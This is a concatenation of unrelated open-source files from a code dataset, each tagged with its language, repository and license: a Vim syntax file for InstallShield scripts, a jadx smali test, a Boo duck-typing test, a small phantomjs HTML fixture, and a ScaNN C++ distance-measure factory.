syn keyword ishdConstant ISLANG_VIETNAMESE_STANDARD IS_MIPS IS_MONO IS_OS2
syn keyword ishdConstant ISOSL_ALL ISOSL_WIN31 ISOSL_WIN95 ISOSL_NT351
syn keyword ishdConstant ISOSL_NT351_ALPHA ISOSL_NT351_MIPS ISOSL_NT351_PPC
syn keyword ishdConstant ISOSL_NT40 ISOSL_NT40_ALPHA ISOSL_NT40_MIPS
syn keyword ishdConstant ISOSL_NT40_PPC IS_PENTIUM IS_POWERPC IS_RAMDRIVE
syn keyword ishdConstant IS_REMOTE IS_REMOVABLE IS_SVGA IS_UNKNOWN IS_UVGA
syn keyword ishdConstant IS_VALID_PATH IS_VGA IS_WIN32S IS_WINDOWS IS_WINDOWS95
syn keyword ishdConstant IS_WINDOWSNT IS_WINOS2 IS_XVGA ISTYPE INFOFILENAME
syn keyword ishdConstant ISRES ISUSER ISVERSION LANGUAGE LANGUAGE_DRV LESS_THAN
syn keyword ishdConstant LINE_NUMBER LISTBOX_ENTER LISTBOX_SELECT LISTFIRST
syn keyword ishdConstant LISTLAST LISTNEXT LISTPREV LOCKEDFILE LOGGING
syn keyword ishdConstant LOWER_LEFT LOWER_RIGHT LIST_NULL MAGENTA MAINCAPTION
syn keyword ishdConstant MATH_COPROCESSOR MAX_STRING MENU METAFILE MMEDIA_AVI
syn keyword ishdConstant MMEDIA_MIDI MMEDIA_PLAYASYNCH MMEDIA_PLAYCONTINUOUS
syn keyword ishdConstant MMEDIA_PLAYSYNCH MMEDIA_STOP MMEDIA_WAVE MOUSE
syn keyword ishdConstant MOUSE_DRV MEDIA MODE NETWORK NETWORK_DRV NEXT
syn keyword ishdConstant NEXTBUTTON NO NO_SUBDIR NO_WRITE_ACCESS NONCONTIGUOUS
syn keyword ishdConstant NONEXCLUSIVE NORMAL NORMALMODE NOSET NOTEXISTS NOTRESET
syn keyword ishdConstant NOWAIT NULL NUMBERLIST OFF OK ON ONLYDIR OS OSMAJOR
syn keyword ishdConstant OSMINOR OTHER_FAILURE OUT_OF_DISK_SPACE PARALLEL
syn keyword ishdConstant PARTIAL PATH PATH_EXISTS PAUSE PERSONAL PROFSTRING
syn keyword ishdConstant PROGMAN PROGRAMFILES RAM_DRIVE REAL RECORDMODE RED
syn keyword ishdConstant REGDB_APPPATH REGDB_APPPATH_DEFAULT REGDB_BINARY
syn keyword ishdConstant REGDB_ERR_CONNECTIONEXISTS REGDB_ERR_CORRUPTEDREGISTRY
syn keyword ishdConstant REGDB_ERR_FILECLOSE REGDB_ERR_FILENOTFOUND
syn keyword ishdConstant REGDB_ERR_FILEOPEN REGDB_ERR_FILEREAD
syn keyword ishdConstant REGDB_ERR_INITIALIZATION REGDB_ERR_INVALIDFORMAT
syn keyword ishdConstant REGDB_ERR_INVALIDHANDLE REGDB_ERR_INVALIDNAME
syn keyword ishdConstant REGDB_ERR_INVALIDPLATFORM REGDB_ERR_OUTOFMEMORY
syn keyword ishdConstant REGDB_ERR_REGISTRY REGDB_KEYS REGDB_NAMES REGDB_NUMBER
syn keyword ishdConstant REGDB_STRING REGDB_STRING_EXPAND REGDB_STRING_MULTI
syn keyword ishdConstant REGDB_UNINSTALL_NAME REGKEY_CLASSES_ROOT
syn keyword ishdConstant REGKEY_CURRENT_USER REGKEY_LOCAL_MACHINE REGKEY_USERS
syn keyword ishdConstant REMOTE_DRIVE REMOVE REMOVEABLE_DRIVE REPLACE
syn keyword ishdConstant REPLACE_ITEM RESET RESTART ROOT ROTATE RUN_MAXIMIZED
syn keyword ishdConstant RUN_MINIMIZED RUN_SEPARATEMEMORY SELECTFOLDER
syn keyword ishdConstant SELFREGISTER SELFREGISTERBATCH SELFREGISTRATIONPROCESS
syn keyword ishdConstant SERIAL SET SETUPTYPE SETUPTYPE_INFO_DESCRIPTION
syn keyword ishdConstant SETUPTYPE_INFO_DISPLAYNAME SEVERE SHARE SHAREDFILE
syn keyword ishdConstant SHELL_OBJECT_FOLDER SILENTMODE SPLITCOMPRESS SPLITCOPY
syn keyword ishdConstant SRCTARGETDIR STANDARD STATUS STATUS95 STATUSBAR
syn keyword ishdConstant STATUSDLG STATUSEX STATUSOLD STRINGLIST STYLE_BOLD
syn keyword ishdConstant STYLE_ITALIC STYLE_NORMAL STYLE_SHADOW STYLE_UNDERLINE
syn keyword ishdConstant SW_HIDE SW_MAXIMIZE SW_MINIMIZE SW_NORMAL SW_RESTORE
syn keyword ishdConstant SW_SHOW SW_SHOWMAXIMIZED SW_SHOWMINIMIZED
syn keyword ishdConstant SW_SHOWMINNOACTIVE SW_SHOWNA SW_SHOWNOACTIVATE
syn keyword ishdConstant SW_SHOWNORMAL SYS_BOOTMACHINE SYS_BOOTWIN
syn keyword ishdConstant SYS_BOOTWIN_INSTALL SYS_RESTART SYS_SHUTDOWN SYS_TODOS
syn keyword ishdConstant SELECTED_LANGUAGE SHELL_OBJECT_LANGUAGE SRCDIR SRCDISK
syn keyword ishdConstant SUPPORTDIR TEXT TILED TIME TRUE TYPICAL TARGETDIR
syn keyword ishdConstant TARGETDISK UPPER_LEFT UPPER_RIGHT USER_ADMINISTRATOR
syn keyword ishdConstant UNINST VALID_PATH VARIABLE_LEFT VARIABLE_UNDEFINED
syn keyword ishdConstant VER_DLL_NOT_FOUND VER_UPDATE_ALWAYS VER_UPDATE_COND
syn keyword ishdConstant VERSION VIDEO VOLUMELABEL WAIT WARNING WELCOME WHITE
syn keyword ishdConstant WIN32SINSTALLED WIN32SMAJOR WIN32SMINOR WINDOWS_SHARED
syn keyword ishdConstant WINMAJOR WINMINOR WINDIR WINDISK WINSYSDIR WINSYSDISK
syn keyword ishdConstant XCOPY_DATETIME YELLOW YES
syn keyword ishdFunction AskDestPath AskOptions AskPath AskText AskYesNo
syn keyword ishdFunction AppCommand AddProfString AddFolderIcon BatchAdd
syn keyword ishdFunction BatchDeleteEx BatchFileLoad BatchFileSave BatchFind
syn keyword ishdFunction BatchGetFileName BatchMoveEx BatchSetFileName
syn keyword ishdFunction ComponentDialog ComponentAddItem
syn keyword ishdFunction ComponentCompareSizeRequired ComponentDialog
syn keyword ishdFunction ComponentError ComponentFileEnum ComponentFileInfo
syn keyword ishdFunction ComponentFilterLanguage ComponentFilterOS
syn keyword ishdFunction ComponentGetData ComponentGetItemSize
syn keyword ishdFunction ComponentInitialize ComponentIsItemSelected
syn keyword ishdFunction ComponentListItems ComponentMoveData
syn keyword ishdFunction ComponentSelectItem ComponentSetData ComponentSetTarget
syn keyword ishdFunction ComponentSetupTypeEnum ComponentSetupTypeGetData
syn keyword ishdFunction ComponentSetupTypeSet ComponentTotalSize
syn keyword ishdFunction ComponentValidate ConfigAdd ConfigDelete ConfigFileLoad
syn keyword ishdFunction ConfigFileSave ConfigFind ConfigGetFileName
syn keyword ishdFunction ConfigGetInt ConfigMove ConfigSetFileName ConfigSetInt
syn keyword ishdFunction CmdGetHwndDlg CtrlClear CtrlDir CtrlGetCurSel
syn keyword ishdFunction CtrlGetMLEText CtrlGetMultCurSel CtrlGetState
syn keyword ishdFunction CtrlGetSubCommand CtrlGetText CtrlPGroups
syn keyword ishdFunction CtrlSelectText CtrlSetCurSel CtrlSetFont CtrlSetList
syn keyword ishdFunction CtrlSetMLEText CtrlSetMultCurSel CtrlSetState
syn keyword ishdFunction CtrlSetText CallDLLFx ChangeDirectory CloseFile
syn keyword ishdFunction CopyFile CreateDir CreateFile CreateRegistrySet
syn keyword ishdFunction CommitSharedFiles CreateProgramFolder
syn keyword ishdFunction CreateShellObjects CopyBytes DefineDialog Delay
syn keyword ishdFunction DeleteDir DeleteFile Do DoInstall DeinstallSetReference
syn keyword ishdFunction DeinstallStart DialogSetInfo DeleteFolderIcon
syn keyword ishdFunction DeleteProgramFolder Disable EzBatchAddPath
syn keyword ishdFunction EzBatchAddString ExBatchReplace EnterDisk
syn keyword ishdFunction EzConfigAddDriver EzConfigAddString EzConfigGetValue
syn keyword ishdFunction EzConfigSetValue EndDialog EzDefineDialog ExistsDir
syn keyword ishdFunction ExistsDisk ExitProgMan Enable EzBatchReplace
syn keyword ishdFunction FileCompare FileDeleteLine FileGrep FileInsertLine
syn keyword ishdFunction FindAllDirs FindAllFiles FindFile FindWindow
syn keyword ishdFunction GetFileInfo GetLine GetFont GetDiskSpace GetEnvVar
syn keyword ishdFunction GetExtents GetMemFree GetMode GetSystemInfo
syn keyword ishdFunction GetValidDrivesList GetWindowHandle GetProfInt
syn keyword ishdFunction GetProfString GetFolderNameList GetGroupNameList
syn keyword ishdFunction GetItemNameList GetDir GetDisk HIWORD Handler Is
syn keyword ishdFunction ISCompareServicePack InstallationInfo LOWORD LaunchApp
syn keyword ishdFunction LaunchAppAndWait ListAddItem ListAddString ListCount
syn keyword ishdFunction ListCreate ListCurrentItem ListCurrentString
syn keyword ishdFunction ListDeleteItem ListDeleteString ListDestroy
syn keyword ishdFunction ListFindItem ListFindString ListGetFirstItem
syn keyword ishdFunction ListGetFirstString ListGetNextItem ListGetNextString
syn keyword ishdFunction ListReadFromFile ListSetCurrentItem
syn keyword ishdFunction ListSetCurrentString ListSetIndex ListWriteToFile
syn keyword ishdFunction LongPathFromShortPath LongPathToQuote
syn keyword ishdFunction LongPathToShortPath MessageBox MessageBeep NumToStr
syn keyword ishdFunction OpenFile OpenFileMode PathAdd PathDelete PathFind
syn keyword ishdFunction PathGet PathMove PathSet ProgDefGroupType ParsePath
syn keyword ishdFunction PlaceBitmap PlaceWindow PlayMMedia QueryProgGroup
syn keyword ishdFunction QueryProgItem QueryShellMgr RebootDialog ReleaseDialog
syn keyword ishdFunction ReadBytes RenameFile ReplaceProfString ReloadProgGroup
syn keyword ishdFunction ReplaceFolderIcon RGB RegDBConnectRegistry
syn keyword ishdFunction RegDBCreateKeyEx RegDBDeleteKey RegDBDeleteValue
syn keyword ishdFunction RegDBDisConnectRegistry RegDBGetAppInfo RegDBGetItem
syn keyword ishdFunction RegDBGetKeyValueEx RegDBKeyExist RegDBQueryKey
syn keyword ishdFunction RegDBSetAppInfo RegDBSetDefaultRoot RegDBSetItem
syn keyword ishdFunction RegDBSetKeyValueEx SeekBytes SelectDir SetFileInfo
syn keyword ishdFunction SelectDir SelectFolder SetupType SprintfBox SdSetupType
syn keyword ishdFunction SdSetupTypeEx SdMakeName SilentReadData SilentWriteData
syn keyword ishdFunction SendMessage Sprintf System SdAskDestPath SdAskOptions
syn keyword ishdFunction SdAskOptionsList SdBitmap SdComponentDialog
syn keyword ishdFunction SdComponentDialog2 SdComponentDialogAdv SdComponentMult
syn keyword ishdFunction SdConfirmNewDir SdConfirmRegistration SdDisplayTopics
syn keyword ishdFunction SdFinish SdFinishReboot SdInit SdLicense SdMakeName
syn keyword ishdFunction SdOptionsButtons SdProductName SdRegisterUser
syn keyword ishdFunction SdRegisterUserEx SdSelectFolder SdSetupType
syn keyword ishdFunction SdSetupTypeEx SdShowAnyDialog SdShowDlgEdit1
syn keyword ishdFunction SdShowDlgEdit2 SdShowDlgEdit3 SdShowFileMods
syn keyword ishdFunction SdShowInfoList SdShowMsg SdStartCopy SdWelcome
syn keyword ishdFunction SelectFolder ShowGroup ShowProgamFolder SetColor
syn keyword ishdFunction SetDialogTitle SetDisplayEffect SetErrorMsg
syn keyword ishdFunction SetErrorTitle SetFont SetStatusWindow SetTitle
syn keyword ishdFunction SizeWindow StatusUpdate StrCompare StrFind StrGetTokens
syn keyword ishdFunction StrLength StrRemoveLastSlash StrSub StrToLower StrToNum
syn keyword ishdFunction StrToUpper ShowProgramFolder UnUseDLL UseDLL VarRestore
syn keyword ishdFunction VarSave VerUpdateFile VerCompare VerFindFileVersion
syn keyword ishdFunction VerGetFileVersion VerSearchAndUpdateFile VerUpdateFile
syn keyword ishdFunction Welcome WaitOnDialog WriteBytes WriteLine
syn keyword ishdFunction WriteProfString XCopyFile
syn keyword ishdTodo contained TODO
"integer number, or floating point number without a dot.
syn match ishdNumber "\<\d\+\>"
"floating point number, with dot
syn match ishdNumber "\<\d\+\.\d*\>"
"floating point number, starting with a dot
syn match ishdNumber "\.\d\+\>"
" String constants
syn region ishdString start=+"+ skip=+\\\\\|\\"+ end=+"+
syn region ishdComment start="//" end="$" contains=ishdTodo
syn region ishdComment start="/\*" end="\*/" contains=ishdTodo
" Pre-processor commands
syn region ishdPreCondit start="^\s*#\s*\(if\>\|ifdef\>\|ifndef\>\|elif\>\|else\>\|endif\>\)" skip="\\$" end="$" contains=ishdComment,ishdString
if !exists("ishd_no_if0")
syn region ishdHashIf0 start="^\s*#\s*if\s\+0\>" end=".\|$" contains=ishdHashIf0End
syn region ishdHashIf0End contained start="0" end="^\s*#\s*\(endif\>\|else\>\|elif\>\)" contains=ishdHashIf0Skip
syn region ishdHashIf0Skip contained start="^\s*#\s*\(if\>\|ifdef\>\|ifndef\>\)" skip="\\$" end="^\s*#\s*endif\>" contains=ishdHashIf0Skip
endif
syn region ishdIncluded contained start=+"+ skip=+\\\\\|\\"+ end=+"+
syn match ishdInclude +^\s*#\s*include\>\s*"+ contains=ishdIncluded
syn cluster ishdPreProcGroup contains=ishdPreCondit,ishdIncluded,ishdInclude,ishdDefine,ishdHashIf0,ishdHashIf0End,ishdHashIf0Skip,ishdNumber
syn region ishdDefine start="^\s*#\s*\(define\|undef\)\>" end="$" contains=ALLBUT,@ishdPreProcGroup
" Define the default highlighting.
" Only when an item doesn't have highlighting yet
hi def link ishdNumber Number
hi def link ishdError Error
hi def link ishdStatement Statement
hi def link ishdString String
hi def link ishdComment Comment
hi def link ishdTodo Todo
hi def link ishdFunction Identifier
hi def link ishdConstant PreProc
hi def link ishdType Type
hi def link ishdInclude Include
hi def link ishdDefine Macro
hi def link ishdIncluded String
hi def link ishdPreCondit PreCondit
hi def link ishdHashIf0Skip ishdHashIf0
hi def link ishdHashIf0End ishdHashIf0
hi def link ishdHashIf0 Comment
let b:current_syntax = "ishd"
" vim: ts=8
| VimL | 5 | uga-rosa/neovim | runtime/syntax/ishd.vim | [
"Vim"
] |
.class public Lconditions/TestBooleanToLong;
.super Ljava/lang/Object;
.field private showConsent:Z
.method public writeToParcel(Lconditions/TestBooleanToLong;)V
.locals 0
iget-boolean p1, p0, Lconditions/TestBooleanToLong;->showConsent:Z
int-to-long p1, p1
invoke-virtual {p0, p1}, Lconditions/TestBooleanToLong;->write(J)V
return-void
.end method
.method public write(J)V
.locals 0
return-void
.end method
| Smali | 3 | mazhidong/jadx | jadx-core/src/test/smali/conditions/TestBooleanToLong.smali | [
"Apache-2.0"
] |
"""
Foo.bar
42
42
before field
42
before property
42
"""
class Foo:
[getter(Function)]
public function as duck
def constructor(function):
self.function = function
def bar():
print "Foo.bar"
function()
self.function()
def bar():
print "42"
f = Foo(bar)
f.bar()
print "before field"
f.function()
print "before property"
f.Function()
| Boo | 1 | popcatalin81/boo | tests/testcases/ducky/callable-1.boo | [
"BSD-3-Clause"
] |
<!doctype html>
<title>i am includejs one</title>
| HTML | 0 | ficstar/phantomjs | test/lib/www/includejs1.html | [
"BSD-3-Clause"
] |
// Copyright 2021 The Google Research Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "scann/distance_measures/distance_measure_factory.h"
namespace research_scann {
StatusOr<shared_ptr<DistanceMeasure>> GetDistanceMeasure(
const DistanceMeasureConfig& config) {
if (config.distance_measure().empty()) {
return InvalidArgumentError(
"Empty DistanceMeasureConfig proto! Must specify distance_measure.");
}
return GetDistanceMeasure(config.distance_measure());
}
StatusOr<shared_ptr<DistanceMeasure>> GetDistanceMeasure(string_view name) {
if (name == "DotProductDistance")
return shared_ptr<DistanceMeasure>(new DotProductDistance());
if (name == "BinaryDotProductDistance")
return shared_ptr<DistanceMeasure>(new BinaryDotProductDistance());
if (name == "AbsDotProductDistance")
return shared_ptr<DistanceMeasure>(new AbsDotProductDistance());
if (name == "L2Distance")
return shared_ptr<DistanceMeasure>(new L2Distance());
if (name == "SquaredL2Distance")
return shared_ptr<DistanceMeasure>(new SquaredL2Distance());
if (name == "NegatedSquaredL2Distance")
return shared_ptr<DistanceMeasure>(new NegatedSquaredL2Distance());
if (name == "L1Distance")
return shared_ptr<DistanceMeasure>(new L1Distance());
if (name == "CosineDistance")
return shared_ptr<DistanceMeasure>(new CosineDistance());
if (name == "BinaryCosineDistance")
return shared_ptr<DistanceMeasure>(new BinaryCosineDistance());
if (name == "GeneralJaccardDistance")
return shared_ptr<DistanceMeasure>(new GeneralJaccardDistance());
if (name == "BinaryJaccardDistance")
return shared_ptr<DistanceMeasure>(new BinaryJaccardDistance());
if (name == "LimitedInnerProductDistance")
return shared_ptr<DistanceMeasure>(new LimitedInnerProductDistance());
if (name == "GeneralHammingDistance")
return shared_ptr<DistanceMeasure>(new GeneralHammingDistance());
if (name == "BinaryHammingDistance")
return shared_ptr<DistanceMeasure>(new BinaryHammingDistance());
if (name == "NonzeroIntersectDistance")
return shared_ptr<DistanceMeasure>(new NonzeroIntersectDistance());
return InvalidArgumentError("Invalid distance_measure: '%s'", name);
}
} // namespace research_scann
| C++ | 4 | DionysisChristopoulos/google-research | scann/scann/distance_measures/distance_measure_factory.cc | [
"Apache-2.0"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.